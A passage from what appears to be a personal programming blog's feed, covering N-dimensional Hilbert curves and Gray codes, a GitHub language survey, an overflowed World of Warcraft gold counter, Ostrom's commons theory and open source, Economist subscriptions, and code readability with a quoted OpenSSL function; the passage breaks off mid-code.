somewhat befuddling picture of an example rendered with POV-Ray:</p> <div class="media"> <a href="hilbert3d-o3.png"> <img src="hilbert3d-o3.png" /> </a> <div class="subtitle"> 3d Hilbert curve of order 3 - the green bulb is the start of the curve </div> </div> <p>We can do even better than 3 dimensions, though, by generalising the Hilbert curve to N dimensions. Concretely, we would like to find a way to translate an offset along the N-dimensional Hilbert curve to co-ordinates, and vice-versa. The algorithms to do this are somewhat tricky, but are well known and widely described. A particularly nice exposition can be found in the paper <a rel="external" href="http://www.cs.dal.ca/research/techreports/cs-2006-07">"Compact Hilbert Indices"</a> by Chris Hamilton. This section is based on Hamilton's version of the classic algorithm first devised by A. R. Butz in the 1970s (though, see comments in my code for corrections to some minor errors in the paper that may trip up implementers).</p> <p>We start with a slight detour - the surprising connection between the Hilbert curve and <a rel="external" href="http://en.wikipedia.org/wiki/Gray_code">Gray codes</a>. Recall that Gray codes are a way to traverse all numbers of a given bit width in such a way that only one bit differs from each value to the next. Here, for example, are the 2-bit and 3-bit Gray codes:</p> <h3 id="2-bit">2-bit</h3> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>0, 0</span></span> <span class="giallo-l"><span>0, 1</span></span> <span class="giallo-l"><span>1, 1</span></span> <span class="giallo-l"><span>1, 0</span></span></code></pre><h3 id="3-bit">3-bit</h3> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>0, 0, 0</span></span> <span class="giallo-l"><span>0, 0, 1</span></span> <span class="giallo-l"><span>0, 1, 1</span></span> <span class="giallo-l"><span>0, 1, 0</span></span> <span class="giallo-l"><span>1, 1, 0</span></span> <span class="giallo-l"><span>1, 1, 1</span></span> <span class="giallo-l"><span>1, 0, 1</span></span> <span class="giallo-l"><span>1, 0, 0</span></span></code></pre> <p>Now, watch what happens when we treat each set of bits in the N-bit Gray code as co-ordinates in N-dimensional space (with X being the rightmost bit), and draw the resulting curves:</p> <table class="spacertable"> <tr> <th width="50%"> 2-bit </th> <th> 3-bit </th> <tr> <td valign="top"> <img src="hilbert2d-o1.png" alt="Hilbert 2d O1"/> </td> <td valign="top"> <img src="hilbert3d-o1.png" alt="Hilbert 3d O1"/> </td> </tr> </tr> </table> <p>Voila, the Order 1 Hilbert curves in 2 and 3 dimensions! A bit of pondering shows that this generalises to any dimension - if we have a hypercube with dimensions 1x1x1..., the Gray code will traverse all the vertices of the cube by changing only one dimension at a time. Specifically, we can say that the N-bit Gray code is a Hilbert order traversal of the vertices of an N-dimensional hypercube. Effectively, this means that we can now draw the Order 1 Hilbert curve for any dimension - so let's refresh our memories of how the Order 1 curve relates to the higher orders.</p> <table class="spacertable"> <tr> <th> O1 </th> <th> O2 </th> <th> O3 </th> </tr> <tr> <td> <img src="hilbert2d-o1-marked.png" alt="Hilbert 2d O1"/> </td> <td> <img src="hilbert2d-o2-marked.png" alt="Hilbert 2d O2"/> </td> <td> <img src="hilbert2d-o3-marked.png" alt="Hilbert 2d O3"/> </td> </tr> </table> <p>Notice that as we move from one order to the next, we replace each vertex with a sub-curve that has the same shape as the <strong>O1</strong> traversal. I've marked one path through this recursive process in the images above, showing the subcurve for the upper-left vertex in every step of the recursion. At every step, we also need to transform the subcurve through rotation and reflection to make sure that its start matches the end of the previous subcurve, and its end matches the beginning of the next subcurve. This process generalises trivially to N dimensions. Since the <strong>O1</strong> curve is just a Gray code traversal of the N-dimensional cube, we can think of the Order M Hilbert curve as a collection of hypercubes nested M deep.</p> <p>Now, let's see if we can use this construction process to figure out the co-ordinates of a point, given the offset along the Hilbert curve. We'll ignore the rotations and reflections for the moment. We start with the <strong>O1</strong> curve of dimension N, and the N most significant bits of the offset. By checking which vertex of the hypercube this maps to, we can peel off the most significant bit of each co-ordinate. For example, if we wanted to locate offset 63 in the 2-dimensional Order 3 curve (the upper-left corner), our first two bits would be (1, 1). This is the fourth point in the Gray code traversal of the hypercube, which gives us the upper-left quadrant of the <strong>O1</strong> cube. We now know that the most significant bit of our X co-ordinate is 0, and the most significant bit of our Y co-ordinate is 1. Doing the same thing for the matching sub-hypercube in the <strong>O2</strong> curve will give us the next bit, and we can drill down through the hypercubes in this way peeling off one bit of each co-ordinate, until we have all M bits. This process also works in reverse - if we start with a set of co-ordinates, we can drill down through the hypercubes, determining N bits of the curve offset at every step. So, generally, at every step of the Gray code recursion we get a nested hypercube of dimension N, and N bits of co-ordinate or offset information. Finally, we need to deal with the rotations and reflections required to make the heads and tails of the Gray code subcurves match up. We'll need to perform this transformation at every step, before we extract our information bits. All we need is a way to rotate and reflect a given hypercube to make its beginning and end match up with its position on the curve. The transform required turns out to map to a simple set of bit operations described in Section 2.3.1 of Hamilton's paper.</p> <p>And that's it - using this general process, we can now calculate co-ordinates or offsets for points on an N-dimensional Hilbert curve. Hopefully, I've managed to give some intuition for how this algorithm works, but I've glossed over pretty much all the details. See the original paper or the code I'm publishing for specifics. I should also note in passing that this is just one way to draw the Hilbert curve - at higher dimensions there are many, many different well-formed Hilbert curves.</p> <h2 id="a-portrait-of-the-hilbert-curve-as-a-young-fruit-salad">A portrait of the Hilbert curve as a young fruit salad</h2> <p>At last we are in a position to traverse the 3-dimensional RGB cube in Hilbert order, and have another stab at visualising the 2d Hilbert curve.</p> <div class="media"> <a href="hilbert-hilbert-fullsize.png"> <img src="hilbert-hilbert-small.png" /> </a> <div class="subtitle"> Hilbert on Hilbert </div> </div> <p>Ladies and gentlemen, I present a Hilbert curve traversal of the three-dimensional RGB colour space, projected onto a two-dimensional Hilbert curve covering the plane. I think it's absolutely damn beautiful. Like some weird piece of abstract art - a Kandinsky or perhaps a Pollock - the more you look at this image, the more structure you see. If you divide it into quadrants, and sub-quadrants, and sub-sub-quadrants, you can trace the path of the Hilbert curve at every level of recursion by following the flow of colours (use the 2d Hilbert curves elsewhere in this post for reference if you're having trouble). If you're looking at the full-size image, this works even at very large magnifications, until the human ability to perceive colour differences starts to fail. Incredibly, this image contains <em>exactly</em> the same set of colours as the unattractive Zigzag visualisation at the start of the post - the only difference is the way the colours are arranged. This is so remarkable that you might want to verify this yourself using the colour analysis functionality of your favourite image editor (make sure you use the full-size images for best effect). We've also achieved the goal we set out with - the clustering properties of the 2d Hilbert curve are directly visible as patches of similar colour.</p> <p>By the way - if Hilbert curves float your boat, you may also be interested in a previous post of mine, in which I <a href="https://corte.si/posts/code/hilbert/explorer/">visualise an IP geolocation database with Hilbert curves</a>.</p> <h2 id="the-code">The code</h2> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">git</span><span style="color: #032F62;"> clone git://github.com/cortesi/scurve.git</span></span></code></pre> <p>I've released the code used to render the images in this article as a Python project called <a rel="external" href="http://github.com/cortesi/scurve">scurve</a> (for space-filling curve). This project aims to be collection of clear implementations of algorithms related to space filling curves, together with a set of tools for visualising them. If you're interested in this kind of thing keep an eye on the project - I plan to add more interesting goodies in the next few weeks.</p> The impact of language choice on github projects 2009-12-15T00:00:00+00:00 2009-12-15T00:00:00+00:00 https://corte.si/posts/code/devsurvey/ <p>Although I spend a lot of my play-time fooling about with other languages, my professional and released code consists of Python, C, C++ and, alas, Javascript. I've lived in this tiny corner of the magic garden of modern software development for 10 years, and I'm itching to strike out in a different direction for my next project. With this in mind, I've started to wonder about the impact of language choice on the development process. Are there major differences between projects in different languages? Is it possible to quantify these differences? I decided to try to gather some hard numbers. I started by writing a small script to watch the <a rel="external" href="http://github.com/timeline">public timeline</a> on <a rel="external" href="http://www.github.com">github</a>. Over a period of weeks, I collected a list of about 30 thousand active projects. Using the github API, I eliminated projects with less than 3 watchers, on the basis that these are likely to be small personal repositories like dotfiles, programming exercises and so forth. After this, I was left with some 5000 repositories, which I checked out, giving me about 55G of data to work with. The next step was to analyse the data, extracting commits, committers and line counts for each file type contained in each project. Lastly, I got rid of duplicate projects by looking for matching commit hashes. From start to end, this process took more than a week to complete. The end result result is a database consisting of 3 400 repositories, 20 000 authors, and 1.5 million commits. I'm releasing the dataset for others to play with - see the bottom of this post for information.</p> <p>The rest of this post takes a basic look at the numbers for 12 languages. I had to leave some out for lack of data. Haskell, for example, didn't make the cut with only 18 projects. Ah, well.</p> <p>Lets look at the numbers.</p> <h2 id="the-basics">The Basics</h2> <p>Lets start with a quick overview of the basics of the dataset.</p> <div class="media"> <a href="samplesize.png"> <img src="samplesize.png" /> </a> <div class="subtitle"> Sample size </div> </div> <p>First, the sample size. Clearly, github is very popular with the Ruby crowd, with more than four times as many projects as Python, the runner-up. The sample sizes for C#, Erlang and Scala are pretty small, so the results for these languages aren't as firm as for the others.</p> <div class="media"> <a href="median_contributors.png"> <img src="median_contributors.png" /> </a> <div class="subtitle"> Median contributors </div> </div> <p>This graph shows the median number of contributors to projects in each language. The red line here and in the graphs below is the median for all projects in the dataset. <strong>Most projects have around 3 contributors, with Perl and Java projects having about 5, and Javascript and Objective C around 2</strong>.</p> <div class="media"> <a href="median_commits.png"> <img src="median_commits.png" /> </a> <div class="subtitle"> Median commits </div> </div> <p>Here we see the median number of commits for projects in each language - in some senses, we can view this as a proxy for project age. <strong>Most projects have around 75 commits.</strong> The Perl and C++ data, however, seems significant - projects in these languages on average have a much longer commit history. I suspect that this is due to a decline in popularity in these languages. Recall that I collected data only for projects that had recent commits. If fewer new projects are created in C++ and Perl, we would expect projects in these languages to be older, on average.</p> <div class="media"> <a href="median_commitsize.png"> <img src="median_commitsize.png" /> </a> <div class="subtitle"> Median commit size </div> </div> <p>This chart shows the median commit size, in lines of code. We take the total commit size to be the sum of lines inserted and the lines deleted, as reported by "git log --shortstat". <strong>Most commits touch around 19 lines of code</strong>. The C# outlier is probably due to the small sample set. I suspect that the differences in this graph are a reflection of basic language verbosity, with Objective C, C++ and Java being more verbose, and Perl, Python and Ruby being less so.</p> <div class="media"> <a href="median_commit_files.png"> <img src="median_commit_files.png" /> </a> <div class="subtitle"> median files touched per commit </div> </div> <p><strong>Most commits touch about 4 files, with C++ touching somewhat more, and Perl, Python and Ruby somewhat less.</strong> The C# outlier is probably due to small sample size.</p> <h2 id="the-contributors">The Contributors</h2> <div class="media"> <a href="median_commits_per_contributor.png"> <img src="median_commits_per_contributor.png" /> </a> <div class="subtitle"> Median commits per contributor </div> </div> <p>This shows the median number of commits contributors make. <strong> The average contributor contributes about 5 commits to a project. C, Objective C and Ruby developers contribute somewhat less, PHP, C#, Java and Javascript developers somewhat more.</strong> I suspect the results for C and Ruby are due to projects in these languages receiving more one-off contributions.</p> <p>An average of only 5 commits - that's not much. Lets look at this from a different perspective - graphing the percentage of the total commits to a project made by contributors.</p> <div class="media"> <a href="author_commit_quantile.png"> <img src="author_commit_quantile.png" /> </a> <div class="subtitle"> % commits vs % contributors </div> </div> <p>The percentage of commits by contributors is shown on the Y axis, and the matching f-value on the X axis. An f-value of 25 is the bottom <a rel="external" href="http://en.wikipedia.org/wiki/Quartile">quartile</a>, 50 is the median, and 75 is the upper quartile. Looking at the Python graph, for example, we can see that the bottom 75% of contributors provided a bit less than 20% of the commits. The shape of these graphs gives us our first take-away: <strong>For all languages, a small fraction of the committers do the vast majority of the work.</strong> This won't be news to anyone in the Open Source community. More interesting, though, is the fact that <strong>C, C++ and Perl projects are significantly more "top-heavy" than those in other languages, with a smaller core of contributors doing more of the work.</strong></p> <h2 id="how-projects-evolve">How projects evolve</h2> <div class="media"> <a href="contributorsXcommits.png"> <img src="contributorsXcommits.png" /> </a> <div class="subtitle"> Contributors vs Commits </div> </div> <p>This dot plot shows the total number of contributors vs the total number of commits for each project. I've restricted the X and Y values - we're effectively looking at the bottom-left corner of a larger dataset. The red line is a <a rel="external" href="http://en.wikipedia.org/wiki/Local_regression">loess</a> fitted curve. Over a large number of projects, we can consider the number of commits to be a measure of time - the graph effectively shows how quickly projects tend to accumulate contributors over their lifespan. <strong>Ruby projects recruit contributors astoundingly well, with Python a close second. Java, Javascript and PHP projects, on the other hand, do particularly badly.</strong> The fact that the fitted curve is a nice straight line with a consistent slope shows that these results hold for young and old projects alike. Note that the Scala data is not significant - that nice straight line is an extrapolation by the curve fitting algorithm, which is not backed up by information.</p> <div class="media"> <a href="commit_age.png"> <img src="commit_age.png" /> </a> <div class="subtitle"> Commit age </div> </div> <p>This graph shows the number of commits per day, over the first 300 days of a project's life. To prevent skew, I only included projects that are 300 days or older. The red line is a smoothed curve. <strong>C and Perl projects show a marked decline in activity over their first year.</strong> I suspect that the Perl result is due to the fact that it becomes harder and harder to contribute to a Perl codebase, the bigger it gets. The C result is more of a mystery.</p> <h2 id="the-silly">The Silly</h2> <p>And now for something silly.</p> <div class="media"> <a href="swearwords.png"> <img src="swearwords.png" /> </a> <div class="subtitle"> Swearwords per 1000 commits </div> </div> <p>This shows the number of swearwords used per 1000 commits. Objective C and Perl programmers are the most foul-mouthed. Java coders are more restrained, possibly because the language is more corporate, and they're afraid of having their pay docked.</p> <h2 id="the-caveats">The Caveats</h2> <p>There are all sorts of reasons why you should take all of this with a grain of salt. There are many factors that make github projects atypical - not least of which is the use of Git for source control. The way that I collected data skews the dataset in favor of projects with recent commits - unfortunately dead projects aren't included. I detected a project's primary language purely based on line count by file extension. Due to the large number of projects that include Javascript libraries in their repos wholesale, I had to apply a fudge-factor weighting to .js files to get reasonably sensible results.</p> <h2 id="you-can-play-too">You can play too</h2> <p>I had fun playing with this dataset, and I've barely scratched the surface of what could be done with it. I'll probably squeeze another blog post or two out of the data, but in the meantime, I'm making the full database available so people can point out the many mistakes and shortcomings of my analysis. At the time of writing, I still have the checked out repositories, so if you have suggestions for refinements or expansions to the data, let me know.</p> <p>You can check the database out <a rel="external" href="http://github.com/cortesi/devsurvey">here</a>. Be warned, though - it's about 100mb of data.</p> Overflowing World of Warcraft's gold counter 2009-12-11T00:00:00+00:00 2009-12-11T00:00:00+00:00 https://corte.si/posts/wow/beating-the-bank/ <div class="media"> <a href="overflow.jpg"> <img src="overflow.jpg" /> </a> <div class="subtitle"> Bank Overflow </div> </div> <p>It's a little known fact, but my only vice... Well, one of my <em>few</em> vices... Cough. <em>Amongst my vices</em> is the fact that I play <a rel="external" href="http://www.worldofwarcraft.com/">World of Wacraft</a> with a small group of real-life friends. As WoW habits go, mine is a very mild one - I don't often have time to play more than one night a week. On the one night I do have, I want to raid, not grind for gold to service endless repair bills. Irked by my situation, I did what any red-blooded programmer would do. I wrote some code to collect information on auction house price movements, analysed my data, and implemented a Secret Trading Strategy in the form of a Super Secret Addon (which operates, of course, entirely within WoW's terms of service). This has been successful beyond the wildest dreams of avarice - I spend about 5 minutes a day buying and selling the auctions recommended by the SSA, and I make enough to bankroll my entire guild.</p> <p>In fact, I just noticed that I have managed to overflow the "Total gold acquired" counter in my stats tab. Turns out that WoW stores this figure as a 32-bit signed integer, expressed in copper. WoW now thinks I've earned -1981224360 copper in total, something that can be achieved by earing more than 230 000 gold.</p> Elinor Ostrom, the commons problem and Open Source 2009-12-10T00:00:00+00:00 2009-12-10T00:00:00+00:00 https://corte.si/posts/opensource/ostrom/ <div class="media"> <a href="bigstump.jpg"> <img src="bigstump.jpg" /> </a> <div class="subtitle"> Logging in Tasmania </div> </div> <p>In 1968, <a rel="external" href="http://en.wikipedia.org/wiki/Garrett_Hardin">Garrett Hardin</a> coined the term <a rel="external" href="http://www.sciencemag.org/cgi/content/full/162/3859/1243">"Tragedy of the Commons"</a> to describe the economic mechanism that drives humans to destroy common resources. The tragedy applies whenever a common resource is "subtractable" - that is, if use of a resource subtracts from it, making what's been extracted unavailable to others. While the full benefit of appropriating the resource goes to the user, the cost is shared among everyone. The consequence is that for a self-interested user of the resource, the benefits of increasing use will always outweigh the costs, even if the resource is ultimately destroyed in the process. Central to this is the problem of freeloaders - even if the vast majority of users use a resource sustainably, a small number of opportunistic freeloaders can quickly soak up the common benefit. The conventional economic view - first expressed by Hardin himself - is that there are two ways to solve the commons problem: privatising the resource so an owner with a direct interest can govern its use, or imposing regulation from "outside" the system. It's interesting to see, then, that this year's Nobel Prize in Economics went to <a rel="external" href="http://en.wikipedia.org/wiki/Elinor_Ostrom">Elinor Ostrom</a>, someone who has made a name arguing against this fatalistic conclusion. Ostrom and her collaborators have produced a huge literature studying commons that follow a third path - consensual, self-generated governance that limits use to sustainable levels.</p> <p>At the heart of Ostrom's work is a simple question - how does self-governance arise? She approaches this problem with a simple equation describing the cost-benefit analysis of an individual considering whether to participate in communal governance. I've modified it slightly for this post - you can find the original in the paper <a rel="external" href="http://www.scielo.br/pdf/asoc/n10/16883.pdf">"Reformulating the Commons"</a>:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>BN &gt; BE + C</span></span></code></pre> <p><strong>BN</strong> is the benefit derived under a new (presumably communal) governance strategy, <strong>BE</strong> is the benefit derived under the existing (presumably non-communal) strategy, and <strong>C</strong> is the cost associated with switching. It's as simple as that: the benefit of participating has to exceed the cost. In essence, Ostrom's work on the commons explores the panoply of ways in which communities encourage participation in commons governance by modifying this equation through rewards, penalties and social norms. There's no single successful strategy, and the ones that do work rely on concepts like trust, reciprocity, and the types of institutional structures and individuals involved. Additional complexity comes from the interactions between subsets of users - the equation can be different for every user, and coalitions and factions are common. The huge diversity of solutions means that Ostrom's work is dirtier and more empirical than much of economics, and certainly far removed from the world of identical rational actors in Hardin's original analysis.</p> <p>It's interesting to consider how this line of thought applies to Open Source projects. Software is not a classical <a rel="external" href="http://en.wikipedia.org/wiki/Common_pool_resource">common pool resource</a>, because it's not subtractable - there's no cost to the users or developers of a project if I choose to use it. Nonetheless, an Open Source project is definitely a commons, in the sense that it is a community resource that thrives or starves depending on contributions from its members. The participants in this type of commons is the pool of potential contributors, rather than the pool of potential appropriators. In the same way that using a common pool resource applies a shared penalty to everyone, a contribution to the software commons benefits everyone. This type of non-subtractive (additive?) commons has its own version of the freeloader problem - it pays for a contributor to hang back and wait for someone else to add a needed feature, rather than go to the expense of adding it themselves. If the contributor is a company, it might be beneficial to maintain a competitive advantage by not contributing a change back to the community, even if the work has already been done. Open Source projects face an inverted form of the commons problem, which can be expressed in a modified version of Ostrom's commons equation:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>BC &gt; BN + C</span></span></code></pre> <p>Here, <strong>BC</strong> is the benefit of contributing, which has to outweigh the cost of contributing (<strong>C</strong>) plus the benefit of not contributing (<strong>BN</strong>). The Open Source world has produced an immensely sophisticated set of norms and institutions around the terms of this equation, resulting in some of the most successful self-governance structures on the planet. I'd argue that most of the institutional work in Open Source over the last few decades have focused on reducing <strong>C</strong> - a lot of the basic technology and accompanying social norms used in Open Source development (mailing lists, bug trackers, version control systems, communications protocols) is lubrication to reduce the cost of contributing. I think you could even make a plausible case that much of what drives the Internet is just a side-effect of Open Source projects trying to reduce <strong>C</strong>.</p> <p>Another interesting train of thought is spurred by the factor <strong>BN</strong> - the benefit of not contributing. This nicely illuminates the fundamental difference between commercial and individual contributors - for individual contributors without commercial interests, <strong>BN</strong> is almost always 0. For commercial contributors, however, this term can be large. Consequently, we would expect projects where commercial contribution is important to have measures that aim to reduce <strong>BN</strong> - penalties that minimise the benefit of not contributing to the project. The outstanding example here is the Linux kernel project, which has followed a very successful two-fold path to reduce <strong>BN</strong>. The first, of course, is licensing - the GPL imposes stiff penalties (paid in terms of public outcry and possible legal consequences) on those failing to contribute code back to the project under many circumstances. The terms of the GPL do not cover all types of use, however, so there is a second tier of operational penalties for code that is license compliant, but not contributed back to the project. To quote <a rel="external" href="http://en.wikipedia.org/wiki/Greg_Kroah-Hartman">Greg Kroah-Hartman</a> in a <a rel="external" href="http://howsoftwareisbuilt.com/2009/11/18/interview-with-greg-kroah-hartman-linux-kernel-devmaintainer/">recent interview</a>:</p> <blockquote> <p>Because of our huge rate of change, [drivers] pretty much have to be in the kernel tree. Otherwise, keeping a driver outside the kernel is technically a very difficult thing to do, because our internal kernel APIs change very, very rapidly.</p> </blockquote> <p>It's interesting to consider whether this last penalty is intentional or not. There are good technical reasons not to make any stability guarantees for internal APIs, but at the same time I'm sure that many kernel hackers are very aware of the fact that a rapidly-changing internal API compels companies to contribute code. I don't think it's a coincidence that the most successful Open Source project in the world has adopted strategies to penalize potential contributors for not donating code to the community. Reducing <strong>BN</strong> is one of the reasons why Linux has a vastly greater commercial contribution than, say, FreeBSD, and is therefore a much more vibrant and active project.</p> Why I subscribe to the Economist 2009-11-08T00:00:00+00:00 2009-11-08T00:00:00+00:00 https://corte.si/posts/media/why-i-subscribe-to-the-economist/ <p><div class="media"> <a href="economist.jpg"> <img src="economist.jpg" /> </a> <div class="subtitle"> Economist </div> </div> <div class="media"> <a href="guardian.jpg"> <img src="guardian.jpg" /> </a> <div class="subtitle"> Guardian </div> </div></p> <p>I've been a long-time reader of two international papers - the <a rel="external" href="http://www.guardianweekly.co.uk/">Guardian Weekly</a> and the <a rel="external" href="http://www.economist.com/">Economist</a>. Over the last year, these two papers have had startlingly different performance results - the Guardian Media Group posted a record <a rel="external" href="http://www.pressgazette.co.uk/story.asp?storycode=44075">loss of $150 million</a> for the year ending in June, while the Economist reported a record operating <a rel="external" href="http://www.economistgroup.com/our_news/press_releases/2009/results_for_the_year_ended_march_31st_2009.html">profit of $92 million</a> in the year ending in March. I have played my own tiny part in producing this outcome. I used to buy both the Economist and the Guardian Weekly religiously every week - today, I'm a paid-up subscriber to the Economist, and no longer buy the Guardian at all. So, how did the Guardian lose my dime entirely, while The Economist converted me from a news-stand purchaser to a subscriber? The answer to the first part of the question is simple: I no longer buy the Guardian Weekly because most of their content is available on the <a rel="external" href="http://www.guardian.co.uk">Guardian website</a> for free (even the crosswords, which I still print out and do over breakfast). I just have no incentive to fork out money for a piece of paper containing articles I've already read. The Economist has played the game rather more cleverly. Editorial pieces that are likely to generate inbound links are released for free on their website, but the bulk of their factual reporting remained behind a paywall. This alone would not have been enough to induce me to part with my hard-earned doubloons - if they stopped there, I would probably just have switched to free (though probably lower quality) alternatives. They really hooked me by offering a complete, professionally read audio edition, delivered promptly through an RSS feed at the same time as the print edition. This means that my subscription buys me about 8 hours of excellent audio content every week. By contrast, the rather quaint perk I would receive if I subscribed to the Guardian Weekly is a "digital paper" edition - essentially a series of large zoom-able images of the laid-out paper that I can't cut and paste from, link to, or even read comfortably.</p> <p>There's been a fair bit of head-scratching by pundits trying to explain The Economist's unexpected success. Michael Hirschorn from the Atlantic <a rel="external" href="http://www.theatlantic.com/doc/200907/news-magazines">just seems terribly confused</a>, claiming that the Economist "has never had much digital savvy", and concluding inexplicably that it must all just be luck. <a rel="external" href="http://www.niemanlab.org/2009/09/clay-shirky-let-a-thousand-flowers-bloom-to-replace-newspapers-dont-build-a-paywall-around-a-public-good/">Clay Shirkey thinks</a> that the Economist is a niche financial news publication, and that its audience of "traders and business people" are willing to pay for specialist content when other people are not. Both of these opinions are quite wrong. The Economist has played a cunning strategic game with considerable <em>sang-froid</em>, and has shown much more savvy in producing monetizable online material than the Guardian (or indeed the Atlantic). Despite its name the Economist is in fact a general-interest international newspaper, with much more space devoted to news and politics than business and economics. The real answer is, I think, somewhat simpler: the Economist didn't abandon the basic rules of business - exchanging something of value for currency - when they moved online.</p> <p>All of this reminds me of a recent blog post by <a rel="external" href="http://blog.amandapalmer.net/post/200582690/why-i-am-not-afraid-to-take-your-money-by-amanda">Amanda Palmer</a>, lead singer for the Dresden Dolls. She's fairly well known for shamelessly monetizing her fanbase, an attitude she says has roots in her past as a street performer. She makes a convincing case that artists have historically been insulated by record companies from actually having to ask their fans for money. Putting your hat out and asking for coins is seen as grubby - an attitude that is going to have to change as record companies exit stage left and the connection between performers and audiences becomes more direct. A somewhat analogous thing is now happening to many news publishers - the most obvious alternative to selling eyeballs to advertisers is to put on a good show, and ask your audience for money. In my case, that's exactly what the Economist did - they offered me a distinctive benefit, and asked me to pay for it. And, apparently like many other Economist subscribers, I was happy to.</p> Reading Code: In praise of superficial beauty 2009-11-04T00:00:00+00:00 2009-11-04T00:00:00+00:00 https://corte.si/posts/code/reading-code/ <p>Every good programmer has gone through this. You discover a new tool, and it seems shapely and fit for purpose. You start using it, tentatively at first, gradually getting more and more used to its quirks and features. Over time, trust between you grows, and your casual friendship blossoms into something deeper. The program becomes part of that sacred subset of utilities you can't imagine yourself without. All is bliss... Then, one day, you decide to look at the code. Maybe you want to extend it, maybe you're just curious. The moment you fire up your editor on the first source file, you sense that something is wrong. Without reading a line, you notice a certain visual complexity to the code - something to do with deeply nested and over-long functions. Looking closer, you quickly realise that tangles of ifdefs snake through the source like a canker. Weird indentation and non-idiomatic constructs are everywhere. The project's structure sucks - there's no proper component isolation, its innards are a nest of subtle and devious co-dependencies. Beneath the skin of the streamlined program you thought you were using lies a grotesque, bloated, unmaintainable monstrosity. You're heartbroken - you've trusted this tool for years, and now it betrays you like this. It was all a lie - nothing will ever be the same again...</p> <p>I know from personal experience that this is a very traumatic process, so it's with great sympathy that I read a recent article by Marco Peereboom - an vocative and haunting lament with the poetic title <a rel="external" href="http://www.peereboom.us/assl/html/openssl.html">"OpenSSL is written by monkeys"</a>. Marco modestly claims not to be a great programmer, but he <em>is</em> a contributor to OpenBSD, a project that has a frankly <a rel="external" href="http://en.wikipedia.org/wiki/Theo_de_Raadt">psychotic</a> focus on code quality. So, lets see what a graduate of the OpenBSD Academy of Programming makes of the OpenSSL codebase, as illustrated by this illuminating extract:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="c"><span class="giallo-l"><span style="color: #D73A49;">#ifndef</span><span style="color: #6F42C1;"> OPENSSL_NO_STDIO</span></span> <span class="giallo-l"><span style="color: #6A737D;">/*!</span></span> <span class="giallo-l"><span style="color: #6A737D;"> * Load CA certs from a file into a ::STACK. Note that it is somewhat misnamed;</span></span> <span class="giallo-l"><span style="color: #6A737D;"> * it doesn&#39;t really have anything to do with clients (except that a common use</span></span> <span class="giallo-l"><span style="color: #6A737D;"> * for a stack of CAs is to send it to the client). Actually, it doesn&#39;t have</span></span> <span class="giallo-l"><span style="color: #6A737D;"> * much to do with CAs, either, since it will load any old cert.</span></span> <span class="giallo-l"><span style="color: #6A737D;"> * </span><span style="color: #D73A49;">\param</span><span style="color: #E36209;"> file</span><span style="color: #6A737D;"> the file containing one or more certs.</span></span> <span class="giallo-l"><span style="color: #6A737D;"> * </span><span style="color: #D73A49;">\return</span><span style="color: #6A737D;"> a ::STACK containing the certs.</span></span> <span class="giallo-l"><span style="color: #6A737D;"> */</span></span> <span class="giallo-l"><span style="color: #6F42C1;">STACK_OF</span><span>(X509_NAME)</span><span style="color: #D73A49;"> *</span><span style="color: #6F42C1;">SSL_load_client_CA_file</span><span>(</span><span style="color: #D73A49;">const char *</span><span style="color: #E36209;">file</span><span>)</span></span> <span class="giallo-l"><span> {</span></span> <span class="giallo-l"><span> BIO </span><span style="color: #D73A49;">*</span><span>in;</span></span> <span class="giallo-l"><span> X509 </span><span style="color: #D73A49;">*</span><span>x</span><span style="color: #D73A49;">=</span><span style="color: #005CC5;">NULL</span><span>;</span></span> <span class="giallo-l"><span> X509_NAME </span><span style="color: #D73A49;">*</span><span>xn</span><span style="color: #D73A49;">=</span><span style="color: #005CC5;">NULL</span><span>;</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> STACK_OF</span><span>(X509_NAME)</span><span style="color: #D73A49;"> *</span><span>ret </span><span style="color: #D73A49;">=</span><span style="color: #005CC5;"> NULL</span><span>,</span><span style="color: #D73A49;">*</span><span>sk;</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span> sk</span><span style="color: #D73A49;">=</span><span style="color: #6F42C1;">sk_X509_NAME_new</span><span>(xname_cmp);</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span> in</span><span style="color: #D73A49;">=</span><span style="color: #6F42C1;">BIO_new</span><span>(</span><span style="color: #6F42C1;">BIO_s_file_internal</span><span>());</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> ((sk </span><span style="color: #D73A49;">==</span><span style="color: #005CC5;"> NULL</span><span>)</span><span style="color: #D73A49;"> ||</span><span> (in </span><span style="color: #D73A49;">==</span><span style="color: #005CC5;"> NULL</span><span>))</span></span> <span class="giallo-l"><span> {</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> SSLerr</span><span>(SSL_F_SSL_LOAD_CLIENT_CA_FILE,ERR_R_MALLOC_FAILURE);</span></span> <span class="giallo-l"><span style="color: #D73A49;"> goto</span><span> err;</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (</span><span style="color: #D73A49;">!</span><span style="color: #6F42C1;">BIO_read_filename</span><span>(in,file))</span></span> <span class="giallo-l"><span style="color: #D73A49;"> goto</span><span> err;</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;"> for</span><span> (;;)</span></span> <span class="giallo-l"><span> {</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (</span><span style="color: #6F42C1;">PEM_read_bio_X509</span><span>(in,</span><span style="color: #D73A49;">&amp;</span><span>x,</span><span style="color: #005CC5;">NULL</span><span>,</span><span style="color: #005CC5;">NULL</span><span>)</span><span style="color: #D73A49;"> ==</span><span style="color: #005CC5;"> NULL</span><span>)</span></span> <span class="giallo-l"><span style="color: #D73A49;"> break</span><span>;</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (ret </span><span style="color: #D73A49;">==</span><span style="color: #005CC5;"> NULL</span><span>)</span></span> <span class="giallo-l"><span> {</span></span> <span class="giallo-l"><span> ret </span><span style="color: #D73A49;">=</span><span style="color: 